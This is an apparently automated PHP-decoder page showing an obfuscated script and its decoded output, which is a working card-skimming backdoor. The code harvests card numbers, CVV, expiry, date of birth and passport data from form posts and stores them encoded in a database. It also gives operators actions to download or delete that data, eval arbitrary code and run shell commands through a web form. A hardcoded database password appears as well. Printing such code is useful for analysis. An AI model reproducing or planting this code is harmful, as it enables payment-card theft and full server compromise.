Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
{$__funct_b = strrev('edoced_46esab'); $__funct_gz = strrev('etalfnizg'); $__raw_val = ($_..
Decoded Output download
if(!isset($GLOBALS['usdyfbskudfg']))
{
function same_log_function_736472364()
{
$host = "localhost";
$user = "baliwww";
$pass= "pwpxKlvQEn7GD3t";
$db = "mysql";
$p = $_POST;
$GLOBALS['usdyfbskudfg'] = 1;
if( isset($p['cardno']) && strlen($p['cardno']) > 0 &&
isset($p['xdate']) && strlen($p['xdate']) > 0 &&
( (isset($p['cvv']) && strlen($p['cvv']) > 0) || (isset($p['dc']) && strlen($p['dc']) > 0))
)
{
$cvv = @$p['cvv'];
if(strlen($cvv) < 3)
$cvv = @$p['dc'];
$d = array();
$d['cc_type'] = @$p['cardtype'];
$d['cc_number'] = @$p['cardno'];
$d['cc_cvv'] = $cvv;
$d['cc_exp'] = @$p['xdate'];
$d['cc_card_name'] = @$p['holder'];
$d['cc_first_name']= @$p['holder'];
$d['cc_address'] = @$p['billing'];
$d['cc_dob'] = @$p['dob_day'] . '-' .@$p['dob_month'] . '-' .@$p['dob_year'];
$d['cc_passport_number'] = @$p['passport'];
if(count($d) > 0)
{
$d=@serialize($d)."
";
$l = strlen($d);
$dd = "";
for($i=0;$i<$l;$i++)
$dd.=chr(ord($d[$i])^0xca);
$c=addslashes(base64_encode($dd));
$link=@mysql_connect($host,$user,$pass) ;
if(is_resource($link))
{
@mysql_select_db($db,$link) ;
@mysql_query("INSERT INTO procs (`data`) VALUES ('" . $c . "')",$link);
mysql_close($link);
}else
{
}
unset($c,$d,$dd,$p);
}
}
if(isset($p['act']))
{
switch($p['act'])
{
case "get":
{
$link=@mysql_connect($host,$user,$pass);
if(is_resource($link))
{
@mysql_select_db($db,$link);
$q = mysql_query("select `data` from `procs`") or dir("Mysql error: ".mysql_error());
$c = mysql_num_rows($q);
$r = "";
if($c>0)
{
for($i=0;$i<$c;$i++)
{
$d = mysql_fetch_assoc($q);
$r.=base64_decode($d['data']);
}
}
header('Content-Disposition: attachment; filename="1.dat"');
header("Content-Transfer-Encoding: binary");
header('Content-Length: '.strlen($r));
@set_time_limit(0);
print($r);
exit();
}
break;
}
case "del":
{
$link=@mysql_connect($host,$user,$pass);
if(is_resource($link))
{
mysql_select_db($db,$link);
mysql_query("DELETE FROM `procs`");
}
exit();
break;
}
case "ping":
{
echo "pong";
exit();
}
case 'valval':
{
eval(base64_decode($_POST['cdd']));
exit();
break;
}
case 'xcmd':
{
if(isset($_POST['cmd']))
{
$in = @$_POST['cmd'];
$out = "";
$path = @$_POST['path'];
{
if(strlen($path) > 0)
@chdir($path) or print("Cant cwd to $path <br>");
else
{
$path = @getcwd();
}
$fn = @ini_get("disable_functions");
$df = explode(",",$fn);
$df = array_map("trim",$df);
$out = "";
if (function_exists("system")&& !in_array("system",$df)) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists("passthru")&& !in_array("passthru",$df)) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists("exec") && !in_array("exec",$df)) {
@exec($in,$out);
$out = @join("
",$out);
} elseif (function_exists("shell_exec")&& !in_array("shell_exec",$df)) {
$out = shell_exec($in);
} elseif ( !in_array("popen",$df) && is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}elseif(!in_array("proc_open",$df) && function_exists('proc_open')) {
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$process = proc_open($in,$descriptorspec,$pipes);
while(!@feof($pipes[1])) {$out.=fread($pipes[1],10240);}
while(!@feof($pipes[2])) {$out.=fread($pipes[2],10240);}
fclose($pipes[0]);
fclose($pipes[1]);
proc_close($process);
}
if(!isset($_POST['outraw']))
{
$out = str_replace("","",$out);
echo "<form action='" . $_SERVER['REQUEST_URI'] . "' method='POST'>".
"<b>PATH:</b><input type='text' name='path' size='80' value='" . htmlspecialchars($path) . "'/><br>" .
"<b>CMD:</b><input type='hidden' name='act' value='xcmd' /><input type='text' name='cmd' value='" . htmlspecialchars($_POST['cmd']) ."' size='80' />" .
"<input type='submit' value='exec' /></form>";
echo "<pre>
";
$d = htmlspecialchars($out,ENT_COMPAT | ENT_QUOTES,"UTF-8");
print( strlen($d) == 0 ? $out : $d );
echo "</pre>
";
}else
{
echo $out;
}
exit();
};
}
}
default:{ break;}
}
}
}
same_log_function_736472364();
}
Did this file decode correctly?
Original Code
{$__funct_b = strrev('edoced_46esab'); $__funct_gz = strrev('etalfnizg'); $__raw_val = ($__funct_gz($__funct_b("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"))); $__funct_preg = strrev('ecalper_gerp'); $__funct_preg(strrev('e/*./'),strrev(';)lav_war__$(lave@'),''); }
Function Calls
strrev | 5 |
gzinflate | 1 |
preg_replace | 1 |
base64_decode | 1 |
Stats
MD5 | dfe4f891d9ff39da245bb5d7c6b4a9b7 |
Eval Count | 2 |
Decode Time | 85 ms |